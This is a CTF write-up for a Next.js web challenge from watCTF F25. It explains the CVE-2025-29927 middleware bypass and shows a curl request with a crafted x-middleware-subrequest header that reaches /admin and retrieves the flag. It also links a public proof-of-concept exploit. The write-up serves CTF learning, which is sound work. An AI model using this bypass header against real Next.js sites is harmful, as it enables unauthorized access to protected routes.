web

this web series was easy enough, I got one, my teammate got one

waterloo trivia dash

Test your knowledge about Waterloo with this fun trivia game! Complete the quiz to unlock the prize page and claim your reward. http://challs.watctf.org:3080/

Although it does takes me a fat minutes to realized but I have already done a similar challenge in the past...so this is a freebie. After checking the version of Nextjs through wappalyzer.

tldr;

A next.js app with middleware protecting /admin. CVE-2025-29927 lets you bypass middleware by sending an internal subrequest via the header x-middleware-subrequest with repeated src/middleware. I used the public PoC to scan endpoints and found /admin and /admin/login were indeed vulnerable.

Requesting /admin with the bypass header returned the flag.

❯ curl -sSL --compressed 'http://challs.watctf.org:3080/admin'
-H 'x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware'
| strings | grep -oE 'watctf\{[^}]+\}'
watctf{next_js_middleware_is_cool}

Flag — watctf{next_js_middleware_is_cool}

Reference

The crafted header makes Next.js treat the request like an internal middleware subrequest. Combined with RSC/Next headers, this causes the middleware to be skipped or misapplied, exposing protected routes.
- PoC: https://github.com/websecnl/CVE-2025-29927-PoC-Exploit

PreviouswatCTF F25 Nextcrypto

Last updated 1 month ago